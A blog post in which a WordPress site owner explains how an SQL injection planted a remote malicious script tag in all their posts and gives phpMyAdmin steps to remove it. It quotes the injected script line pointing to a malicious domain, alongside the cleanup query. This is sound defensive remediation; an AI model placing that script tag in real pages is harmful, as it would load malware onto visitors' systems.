Early today, a friend Calvin Chew had tweeted me about an antivirus alert on my site. I immediately looked into it, and did some research on the internet.

It turned out that a code linked to a remote malicious Javascript had been inserted to each of my five-hundred-something pages and posts through an SQL injection attack which redirects visitors to a rogue antivirus page that downloads a rootkit onto the local system upon any click, even to close the window. This Javascript trojan is said to mostly affect MediaTemple-hosted WordPress blog.

I’ve managed to successfully cleared the databases in less than an hour on the phone. If your blog has been compromised, read on to find out how.

It would help if you knew as much details of the injection as possible. For example, Kaspersky Internet Security will report the threat name and URL. This can save time and speed up the remedial process.

Step 1:

Change your database user password. On MediaTemple, you can log into the (mt) AccountCenter, then navigate to your server controls and click on “Manage Databases”. Update your password under the “Global Settings” tab.

Step 2:

Log into PHPMyAdmin. The “Admin” buttons in “Databases List” will lead you there.

Step 3:

On the left-hand sidebar, click on the database of your blog which has been compromised.

Step 4:

It may be wise to back-up your database just in case anything happens.

Step 5:

Run a search for </script> in all tables of the database. This will return the rows that contain a Javascript code (including valid ones that you have added). Browse to a row that you do not remember having added a code, and identify the remote URL of the offending code. Copy the entire line of code which, in my case, is <script src="http://ao.euuaw.com/9"></script> (warning: don’t access the URL!).

Step 6:

Now return to the main page of your database and click on the “SQL” tab at the top. Enter the following query:

UPDATE wp_posts SET post_content = replace(post_content,'<script src="http://ao.euuaw.com/9"></script>','');

Here’s what it does: the first part says “access the ‘wp_posts’ table”, then the second says “look into the ‘post_content’ field”. By default, your database table should begin with “wp_”, however you can change this with the table prefix that you have chosen during installation. Then, the function does a search-and-replace in the ‘post_content’ fields of every row, searching for the Javascript code (change it to the code you copied earlier) and replacing it with a blank space (essentially deleting it).

Step 7:

Once that is done, your database table should be clear of the injection. Now update your blog’s wp-config.php file with the new database password. On an antimalware-protected system, check whether the malicious Javascript code still exists on your site.

The threat should be fully cleared from your WordPress blog by now. Just to be safe, you may check through your theme and plugin files for any traces of the threat.